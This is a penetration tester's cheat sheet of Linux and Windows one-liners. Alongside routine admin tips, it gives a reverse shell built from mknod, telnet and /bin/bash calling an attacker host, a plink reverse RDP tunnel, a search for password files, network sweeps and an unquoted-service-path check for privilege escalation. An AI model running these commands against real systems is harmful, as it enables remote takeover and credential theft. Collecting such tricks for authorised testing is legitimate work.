USEFUL COMMANDS

  • LINUX
  • Grepping multiple strings: egrep -i "string1|string2" -  e.g. nmap -sV -p21 10.0.0.* --open |egrep -i "report|open"
  • Creating ip lists: for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
  • Switching to previous directory: cd -
  • Switching to home directory: cd
  • Creating shortcut commands: alias netstat='netstat -antp' or even make up your own commands: i.e. alias makeips='for i in `seq 1 255`;do echo 192.168.1.$i;done'
  • Viewing installed software:
    • Debian based: dpkg --get-selections 
    • RPM based distributions (RHEL, Fedora Core, Cent OS, Suse Linux etc): rpm -qa
  • Searching for Information:
    • find / -name passw*- Search for filenames starting with passw
    • find / | xargs passw - Search for files that contain passw in them.
    • man -k <search_string> (e.g man -k ftp) - will list all man pages that refer to ftp.
  • Reverse netcat shell without netcat:
    • Attacker: nc -lvp 1234
    • Target: mknod backpipe p && telnet <ATTACKERIP> 1234 0<backpipe | /bin/bash 1>backpipe
  • Reverse SSH tunnel:
    • setup ssh: service ssh start && sshd-generate
    • upload plink to target:
    • create reverse tunnel: plink.exe -l root -pw <your ssh pass> -R 3389:127.0.0.1:3389 <attackerIP>  (will map targets rdp port to yours)
    • rdp into yourself to access target: rdesktop 127.0.0.1 -f
      • Finding open egress ports: nmap open.zorinaq.com
    • Open all HTTP hosts on network in firefox: for i in $(nmap -p80 -n 192.168.0.* --open |grep report |cut -d" " -f5);do firefox -new-tab $i;done (have firefox open before running)
    • Simple Web Server: python -m SimpleHTTPServer
    • copying files via scp: scp *.txt <targetip>:








      • WINDOWS
        • quick ping sweep: for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i |findstr TTL
        • Finding unquoted service paths:
          wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """